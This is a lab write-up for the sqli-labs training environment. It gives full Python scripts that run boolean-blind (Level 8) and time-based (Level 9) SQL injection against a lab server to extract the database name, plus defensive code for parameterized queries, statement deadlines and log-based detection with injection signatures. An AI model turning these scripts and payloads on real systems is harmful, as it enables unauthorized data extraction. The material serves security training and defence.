Contents: Boolean blind injection script; Time-based injection script

Install XAMPP and edit its HTTP configuration file in the conf directory as follows. Locate the configuration file, then change the default document root in it so that XAMPP serves phpStudy's www directory. XAMPP responds much faster than phpStudy, so it is used as the server for the SQL injection scripts.

Boolean blind injection script
Take sqli-labs Level 8 as the example. Testing Level 8 shows that it is a string-type (quoted) injection. Build a payload for a boolean blind check on the length of the database name:

```
?id=2' and length(database())=1 -- 
```

The URL is:

```python
url = "http://10.9.75.164/sqli-labs/Less-8/index.php"
```

Build a while loop for the injection; a while loop is used because the number of iterations is not known in advance:

```python
while True:
    i += 1
    # note the space after --, which MySQL needs to treat it as a comment
    payload = f"?id=2' and length(database())={i} -- "
    # build the full URL and send the request
    full_url = url + payload
    print(full_url)
    res = requests.get(url=full_url)
```

When the injected condition is true the page echoes "You are in.........", so that string is used as the stop marker and the length is printed:

```python
    if "You are in........." in res.text:
        print(f"[*] The length is {i}")
        break
```

Full script:

```python
import requests

url = "http://10.9.75.164/sqli-labs/Less-8/index.php"
i = 0

while True:
    i += 1
    payload = f"?id=2' and length(database())={i} -- "
    full_url = url + payload
    print(full_url)
    res = requests.get(url=full_url)
    if "You are in........." in res.text:
        print(f"[*] The length: {i}")
        break
```

The output is as follows: the length of the database name is 8.
Next, use boolean blind injection to obtain the database name one character at a time. ord() converts a character to its ASCII code, and string.printable.strip() produces the set of printable characters to try:

```python
import string

c_set = string.printable.strip()
for i in range(con_len):
    for c in c_set:
        payload = f"?id=2' and ascii(substr(database(),{i + 1},1))={ord(c)} -- "
        full_url = url + payload
        print(full_url)
        res = requests.get(url=full_url)
        if "You are in........." in res.text:
            con += c
            print(f"[*] The content: {con}")
```

The full script is as follows:

```python
import string
import requests

url = "http://10.9.75.164/sqli-labs/Less-8/index.php"
i = 0

# Step 1: find the length of the database name
while True:
    i += 1
    payload = f"?id=2' and length(database())={i} -- "
    full_url = url + payload
    print(full_url)
    res = requests.get(url=full_url)
    if "You are in........." in res.text:
        print(f"[*] The length: {i}")
        break

con_len = i      # length found above; the character loop reads it as con_len
con = ""         # recovered name, built up character by character
c_set = string.printable.strip()

# Step 2: recover each character; the page echo marks a correct guess
for i in range(con_len):
    for c in c_set:
        payload = f"?id=2' and ascii(substr(database(),{i + 1},1))={ord(c)} -- "
        full_url = url + payload
        print(full_url)
        res = requests.get(url=full_url)
        if "You are in........." in res.text:
            con += c
            print(f"[*] The content: {con}")
            break    # move on to the next position once a character matches
```

The run result is as follows: the database name was enumerated successfully.

Time-based injection script
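The oracle this script relies on exists only because the lab's index.php splices the id parameter into its SQL text. The following Python example is added here for the defender's side and is not code from the post or from sqli-labs: it contrasts that splicing with a bound parameter on a constructed in-memory SQLite table, and shows a per-statement deadline that limits what a sleep()-style probe can achieve. The table, the two probe strings and the run_with_deadline helper are assumptions of this example, not lab code.

```python
import sqlite3
import time

# Constructed in-memory stand-in for the lab's table (assumption: not sqli-labs' real schema).
SEED_ROWS = [(1, "Dumb"), (2, "Angelina"), (3, "Dummy")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SEED_ROWS)
    return conn


def lookup_unsafe(conn, user_id):
    # Splices the parameter into the SQL text: the shape the lab page reproduces.
    sql = f"SELECT username FROM users WHERE id='{user_id}' LIMIT 1"
    return conn.execute(sql).fetchone()


def lookup_safe(conn, user_id):
    # Bound parameter: the driver passes the value separately, so it can never become SQL syntax.
    return conn.execute("SELECT username FROM users WHERE id=? LIMIT 1", (user_id,)).fetchone()


# Two probes of the kind a boolean blind script sends: one true condition, one false (constructed).
TRUE_PROBE = "2' and 1=1 -- "
FALSE_PROBE = "2' and 1=2 -- "


def has_boolean_oracle(lookup, conn):
    """True if the endpoint answers the two probes differently, which is all a blind script needs."""
    return lookup(conn, TRUE_PROBE) != lookup(conn, FALSE_PROBE)


def run_with_deadline(conn, sql, seconds):
    """Abort any statement that runs past the deadline; caps the damage of sleep()/heavy-query probes."""
    deadline = time.monotonic() + seconds
    # The progress handler runs every 1000 VM steps; a non-zero return aborts the statement.
    conn.set_progress_handler(lambda: 1 if time.monotonic() > deadline else 0, 1000)
    try:
        return conn.execute(sql).fetchone()
    except sqlite3.DatabaseError:
        return "aborted"
    finally:
        conn.set_progress_handler(None, 0)


# Constructed slow statement: SQLite has no sleep(), so a deep recursive CTE plays that role here.
SLOW_SQL = ("WITH RECURSIVE c(x) AS (SELECT 1 UNION ALL SELECT x+1 FROM c WHERE x < 200000000) "
            "SELECT count(*) FROM c")


if __name__ == "__main__":
    db = make_db()
    print("legit lookup:", lookup_safe(db, "2"))                  # ('Angelina',)
    print("unsafe oracle:", has_boolean_oracle(lookup_unsafe, db))  # True
    print("safe oracle:", has_boolean_oracle(lookup_safe, db))      # False
    print("deadline:", run_with_deadline(db, SLOW_SQL, 0.2))        # aborted
```

With the bound parameter the whole probe string is compared against the id column as a value, so both probes return no row and the true/false difference the script needs disappears. The deadline is a separate control: it does not remove the injection, it only stops a single request from holding a database worker for the attacker's chosen number of seconds.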
Take sqli-labs Level 9 as the example. Testing shows that this level offers no error-based injection, no boolean blind injection and no union query; only time-based injection works, because the page can be made to delay. The approach is the same as for boolean blind injection: first obtain the length of the database name, then its content. Use if and sleep to construct a payload like this:

```python
payload = "?id=1' and if(length(database())=1, sleep(5),1) -- "
```

The time-based script follows the same idea as the boolean blind script. The difference is that the time-based script builds a timeout function and then uses an if statement to decide whether the URL triggered the delay: if the request completes normally, the response body is returned, concatenated with the payload in the while loop to form the full URL and printed; if it times out, the length that the current payload tested is printed.

Here is the full script:

```python
import requests

url = "http://10.9.75.164/sqli-labs/Less-9/index.php"
con_len = 0
con = ""


def get_timeout(url):
    # Return "timeout" if the request exceeds 3 seconds (the injected sleep(5) fired),
    # otherwise return the response body
    try:
        res = requests.get(url=url, timeout=3)
    except requests.exceptions.Timeout:
        return "timeout"
    else:
        return res.text


while True:
    con_len += 1
    payload = f"?id=1' and if(length(database())={con_len},sleep(5),1) -- "
    full_url = url + payload
    if get_timeout(full_url) == "timeout":
        print(f"[*] The length of content: {con_len}")
        break
```

As the screenshot shows, the script returns the length when the request times out. Then, just as the boolean blind script enumerates the database name, use a for loop over the name's positions and change the check in the if statement to test for timeout (the character payload must likewise be wrapped in if(...,sleep(5),1) and sent through get_timeout, otherwise there is no delay to observe):
```python
import requests
import string

url = "http://10.9.75.164/sqli-labs/Less-9/index.php"
con_len = 0
con = ""


def get_timeout(url):
    # Return "timeout" if the request exceeds 3 seconds (the injected sleep(5) fired),
    # otherwise return the response body
    try:
        res = requests.get(url=url, timeout=3)
    except requests.exceptions.Timeout:
        return "timeout"
    else:
        return res.text


# Step 1: length of the database name; a timeout means the guess was right
while True:
    con_len += 1
    payload = f"?id=1' and if(length(database())={con_len},sleep(5),1) -- "
    full_url = url + payload
    print(full_url)
    if get_timeout(full_url) == "timeout":
        print(f"[*] The length of content: {con_len}")
        break

c_set = string.printable.strip()

# Step 2: each character in turn; again a timeout marks the correct guess
for i in range(con_len):
    for c in c_set:
        payload = f"?id=1' and if(ascii(substr(database(),{i + 1},1))={ord(c)},sleep(5),1) -- "
        full_url = url + payload
        if get_timeout(full_url) == "timeout":
            con += c
            print(f"[*] The content: {con}")
            break    # next position once a character matches
```

The run result is as follows: the database name was obtained successfully.
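Both scripts above, the boolean one for Level 8 and the time-based one for Level 9, leave a distinctive trail in the web server's access log: one client sending a burst of requests to one path whose query strings carry length(database()), ascii(substr( or if(...,sleep(5),1), with the time-based variant also producing one slow response per correct guess. The following Python is an added detection example and not part of the post: it parses constructed access-log lines (nginx combined format with $request_time appended is assumed; the client addresses 10.9.75.2 and 10.9.75.3 and the timestamps are made up) and reports, per client and path, whether a burst looks like boolean-blind or time-based probing.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import unquote_plus

# Assumed log format: nginx combined with $request_time appended as the last field.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \d+ "[^"]*" "[^"]*" (?P<rt>[\d.]+)$'
)

# Substrings (matched after URL decoding, lower-cased) that the two scripts put in every request.
SIGNATURES = {
    "length(database())": "boolean-length",
    "ascii(substr(": "char-oracle",
    "sleep(": "time-delay",
    "benchmark(": "time-delay",
    "and if(": "conditional",
}


def decode_target(target):
    # Decode repeatedly so that double encoding cannot hide a keyword.
    prev = None
    while prev != target:
        prev, target = target, unquote_plus(target)
    return target.lower()


def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["rt"] = float(rec["rt"])
    rec["decoded"] = decode_target(rec["target"])
    rec["tags"] = {tag for sig, tag in SIGNATURES.items() if sig in rec["decoded"]}
    return rec


def max_hits_in_window(recs, window):
    # Largest number of flagged requests falling inside any span of length `window` (recs sorted by ts).
    best, j = 0, 0
    for i in range(len(recs)):
        while recs[i]["ts"] - recs[j]["ts"] > window:
            j += 1
        best = max(best, i - j + 1)
    return best


def analyse(lines, window=timedelta(seconds=60), min_hits=5, delay_floor=4.0):
    """Group flagged requests per (client, path) and classify bursts as boolean- or time-based probing."""
    buckets = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["tags"]:
            path = rec["decoded"].split("?", 1)[0]
            buckets[(rec["ip"], path)].append(rec)
    findings = {}
    for key, recs in buckets.items():
        recs.sort(key=lambda r: r["ts"])
        if max_hits_in_window(recs, window) < min_hits:
            continue    # a lone flagged request is noise; the scripts send dozens
        delayed = sum(1 for r in recs if r["rt"] >= delay_floor)
        tags = set().union(*(r["tags"] for r in recs))
        kind = "time-based-blind" if "time-delay" in tags and delayed else "boolean-blind"
        findings[key] = {"hits": len(recs), "delayed": delayed, "tags": sorted(tags), "kind": kind}
    return findings


def _line(ip, sec, target, rt):
    # Helper that builds one constructed log line in the assumed format.
    return (f'{ip} - - [12/Mar/2024:10:00:{sec:02d} +0800] "GET {target} HTTP/1.1" 200 512 '
            f'"-" "python-requests/2.31" {rt:.3f}')


# Constructed sample log: one benign request, the Level 8 length loop, the Level 9 length loop
# (the eighth guess is correct, so only that response is slow), and a single stray probe from
# another client that stays below the burst threshold.
SAMPLE_LOG = (
    [_line("10.9.75.2", 1, "/sqli-labs/Less-8/index.php?id=2", 0.010)]
    + [_line("10.9.75.2", 2 + n,
             f"/sqli-labs/Less-8/index.php?id=2%27%20and%20length(database())={n + 1}%20--%20", 0.011)
       for n in range(8)]
    + [_line("10.9.75.2", 20 + n,
             f"/sqli-labs/Less-9/index.php?id=1%27%20and%20if(length(database())={n + 1},sleep(5),1)%20--%20",
             5.004 if n == 7 else 0.012)
       for n in range(8)]
    + [_line("10.9.75.3", 40, "/sqli-labs/Less-9/index.php?id=1%27%20and%20sleep(5)%20--%20", 5.001)]
)


if __name__ == "__main__":
    for key, finding in analyse(SAMPLE_LOG).items():
        print(key, finding)
```

The burst rule matters as much as the keyword list: a single request containing sleep( is a weak signal, but the scripts on this page cannot work without sending one request per candidate length and then roughly a hundred per character, which is what the per-client, per-path window catches. The delayed count distinguishes the two techniques, because the Level 9 script only produces a slow response when its guess is right.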